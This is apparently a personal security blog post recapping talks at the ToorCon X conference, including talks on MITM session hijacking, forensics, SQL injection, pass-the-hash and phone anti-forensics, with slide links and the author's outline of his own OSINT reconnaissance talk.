9:30 Jay Beale: Owning the Users with The Middler
11:00 James O'Gorman & Matthew Churchill: Digital Forensics - Footsteps in the Snow
14:00 Travis Goodspeed: Repurposing the TI EZ430 Development Tool
15:30 Ryan Sherstobitoff: The Evolution of Cyber Crime
17:00 Jared DeMott: AppSec A-Z: Reverse Engineering, Source Code Auditing, Fuzzing, and Exploitation

Jay Beale's talk was cool, it was on his tool middler which I had heard about before but hadnt played with (I think because it wasnt released). It will MITM the user's browser and hijack EVERY web session, grab the cookies, insert any javascript of your choosing. I dont think the tools website is up yet but his slides from Defcon16 are, you can check those out for more info:
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf

James O'Gorman & Matthew Churchill from Continuum World Wide gave a good talk on forensics. The had some great slides on dispelling forensics myths and gave everyone a chance to ask questions about the current state of forensics.

I missed Travis Goodspeed's talk.

I caught most of Ryan Sherstobitoff's talk. He was from Panda Security and talked about some stats they had accumulated on different types of malware in the wild.

Jared DeMott talked about reversing 101 and exploitation 101. quite a bit to cover in 90 minutes. He covered alot on IDA Pro and then talked about doing some simple exploitation and shellcode development. Fun stuff.

Here's the link to the breakdown of the conference, I wont paste it all.
http://sandiego.toorcon.org/content/section/3/9/

Dan Kaminsky's keynote was awesome, he of course talked about the DNS bug but more importantly he talked about how exploitation and vulnerabilities really have to be though of in groups. Its not so much one vulnerability breaking the internet, but now you can string several together for total world domination. *btw, NONE of that is a quote from his talk.
http://toorcon.org/tcx/1_Kaminsky.pdf

I really enjoyed Ben Feinstein's talk on the "Loaded Dice: SSH Key Exchange & the OpenSSL PRNG Vuln." He did a good job explaining SSL and showing the steps with wireshark and then doing a live demo showing what could happen if you are doing SSH with a bad cert.
http://toorcon.org/tcx/3_Feinstein.pdf

Ariel Waissbein is from Core Security and talked about some new tool they are releasing that will do simulated exploitation by reading in virtual machine config files and interfacing that will core impact "to test to see if you were vulnerable in the past". I wasn't too impressed. If i was taking the I was owned in the past stance I should just go start looking for evidence of the hack rather than testing to see if the Core Impact module works.
http://toorcon.org/tcx/5_Waissbein.pdf

Joe McCray of course rocked the SQLI.
http://toorcon.org/tcx/9_McCray.pdf

Grutz rocked the NTLM pass the hash with windows authentication and squirtle. If i hear the talk one more time I might be able to take in the full impact of what you can do with it.
http://toorcon.org/tcx/10_Grutz.pdf

Sunday was the 20 minute talks.

I caught Christian Heinrich's "Googless" talk where his OWASP group is writing some code to use the google SOAP API to do some searches.

I caught a bit of Marc Bevand's "Breaking UNIX crypt() on the PlayStation 3" talk but had to leave early to get set up for my talk

Got in late for Dan Griffin's "Hacking SharePoint" but it seemed good, looking forward to the slides from it.

Here's what I caught the rest the of the day:
Dan Hubbard's "P0wn the Cloud. The good, the bad, and the pugly of Cloud Computing"

Joshua Brashars' "Owning telephone entry systems (aka why you shouldn't sleep so well)" basically what the title says, default passwords are great, default passwords of 0000 are even better.

Stephan Chenette's "Ultimate Script Deobfuscation: Browser Hooking versus simulation" discussed a very cool tool that would hook IE and document.write and other function I cant remember right now so you can read what the obfuscated java is doing after the browser has done its thing with it. very cool.

David Byrne's "Advanced Techniques in Automated Web Application Testing" talked about Grendal-Scan and the Grendal-Scan blog.

Luis Miras & Zane Lackey's "Mobile Phone Messaging Anti-Forensics" talked about F'ing up the SD card on cell phones that would crash any SD forensics software.

All in all a great con. Huge props to all toorcon crew.

New School Information Gathering ToorconX edition

Here is the outline for my New School Information Gathering talk that I gave at ToorconX.

Open Source Intelligence Gathering (OSINT)‏
FierceDNS
SEAT/Goolag
Google Mail Harvesters
Metagoofil
Online Tools: ServerSniff/DomainTools/CentralOps/Clez.net/Robtex/Spoke
Tying it all together with Maltego

I hid several slides to get the talk into the 20 minute time frame but you should see them in the posted slide deck.

Slides are available here:
http://www.carnal0wnage.com/research/Carnal-NewSchool-ToorconX.pdf

Comments and feedback are always welcome even though I received nothing back from all the people that emailed me asking for them last time :-(

-CG